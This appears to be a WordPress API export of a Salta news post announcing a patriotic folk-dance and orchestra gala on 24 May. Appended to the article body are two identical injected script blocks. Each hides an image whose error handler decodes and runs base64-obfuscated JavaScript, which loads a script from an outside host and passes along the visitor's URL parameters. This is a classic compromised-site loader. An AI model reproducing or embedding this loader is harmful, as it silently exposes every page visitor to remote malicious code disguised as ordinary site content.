{"id":5173,"date":"2025-05-22T09:49:07","date_gmt":"2025-05-22T12:49:07","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5173"},"modified":"2025-08-13T23:32:55","modified_gmt":"2025-08-14T02:32:55","slug":"el-ballet-folklorico-y-la-orquesta-sinfonica-de-salta-protagonizaran-la-gala-patriotica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5173","title":{"rendered":"El Ballet Folkl\u00f3rico y la Orquesta Sinf\u00f3nica de Salta protagonizar\u00e1n la Gala Patri\u00f3tica"},"content":{"rendered":"\n<p><strong><em>El s\u00e1bado 24 de mayo a las 21 horas, el Teatro Provincial Juan Carlos Saravia, ser\u00e1 el escenario elegido para llevar adelante la gala en conmemoraci\u00f3n de la Revoluci\u00f3n de Mayo<\/em><\/strong><\/p>\n\n\n\n<p>El Ballet Folkl\u00f3rico de la Provincia \u201cGeneral Mart\u00edn Miguel de G\u00fcemes\u201d y la Orquesta Sinf\u00f3nica de la Provincia de Salta celebrar\u00e1n un nuevo aniversario de la Revoluci\u00f3n de Mayo. Esta Gala Patri\u00f3tica se llevar\u00e1 a cabo el s\u00e1bado 24 de mayo a las 21 horas en el Teatro Provincial, con entrada libre y gratuita, ofreciendo una experiencia \u00fanica de m\u00fasica en vivo y danza tradicional.<\/p>\n\n\n\n<p>La direcci\u00f3n art\u00edstica del Ballet estar\u00e1 a cargo del maestro&nbsp;<strong>Daniel Espoz<\/strong>, mientras que la Orquesta Sinf\u00f3nica ser\u00e1 conducida por el director invitado Mart\u00edn D\u2019El\u00eda. La gala contar\u00e1 tambi\u00e9n con la participaci\u00f3n especial de los m\u00fasicos invitados como Fernando Calleja y A\u00edto Rodr\u00edguez.<\/p>\n\n\n\n<p>A lo largo de la funci\u00f3n, los cuerpos estables desplegar\u00e1n la riqueza cultural de la regi\u00f3n a trav\u00e9s de cuadros cuidadosamente dise\u00f1ados. El inicio estar\u00e1 marcado por un homenaje folkl\u00f3rico titulado \u201cAl son del 25\u201d, que evocar\u00e1 el esp\u00edritu patri\u00f3tico mediante danzas tradicionales como el Gato, el Cuando y el Peric\u00f3n, cargadas de sentimiento y memoria hist\u00f3rica.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17451-el-ballet-folklorico-y-la-orquesta-sinfonica-de-salta-protagonizaran-la-gala-patriotica.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17451-el-ballet-folklorico-y-la-orquesta-sinfonica-de-salta-protagonizaran-la-gala-patriotica.webp\" alt=\"El Ballet Folkl\u00f3rico y la Orquesta Sinf\u00f3nica de Salta protagonizar\u00e1n la Gala Patri\u00f3tica\"\/><\/a><\/figure>\n\n\n\n<p>La propuesta continuar\u00e1 con un segmento de estilizaci\u00f3n folkl\u00f3rica y libre, que incluir\u00e1 obras como \u00abZamba de Usted\u00bb, \u00abChacarera Santiague\u00f1a\u00bb, \u00abBalderrama\u00bb, \u00abLa Vieja\u00bb y \u00abEstrella Azul\u00bb. Este bloque invitar\u00e1 al p\u00fablico a percibir las diferencias entre el folklore de ra\u00edz y las nuevas formas esc\u00e9nicas, resaltando c\u00f3mo nuestras danzas evolucionan sin perder su esencia. En un giro hacia lo urbano y sentimental, el tercer bloque llevar\u00e1 al p\u00fablico por un recorrido musical y coreogr\u00e1fico a trav\u00e9s del tango y la m\u00fasica popular. Obras como \u00abPor una Cabeza\u00bb, \u00abLa Cumparsita\u00bb y \u00abLa Muerte del \u00c1ngel\u00bb ser\u00e1n interpretadas, mostrando otra faceta del repertorio nacional.<\/p>\n\n\n\n<p>Finalmente, llegar\u00e1 el cuadro \u201cSaltita\u201d, una celebraci\u00f3n del repertorio salte\u00f1o que condensar\u00e1 el esp\u00edritu de la provincia. Este pasaje final, colmado de identidad y orgullo local, incluir\u00e1 temas emblem\u00e1ticos como La Poncho Colorado, La Chicharra Cantora, Arenosa y Malambo de Ginastera, reafirmando el profundo sentido de pertenencia y patriotismo.<\/p>\n\n\n\n<p>Esta Gala Patri\u00f3tica se perfila como un acontecimiento cultural que re\u00fane lo m\u00e1s representativo de la m\u00fasica y la danza salte\u00f1a y argentina.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El s\u00e1bado 24 de mayo a las 21 horas, el Teatro Provincial Juan Carlos Saravia, ser\u00e1 el escenario elegido para llevar adelante la gala en conmemoraci\u00f3n de la Revoluci\u00f3n de Mayo El Ballet Folkl\u00f3rico de la Provincia \u201cGeneral Mart\u00edn Miguel de G\u00fcemes\u201d y la Orquesta Sinf\u00f3nica de la Provincia de Salta celebrar\u00e1n un nuevo aniversario [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-5173","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5173"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5173"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5173\/revisions"}],"predecessor-version":[{"id":6487,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5173\/revisions\/6487"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5174"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}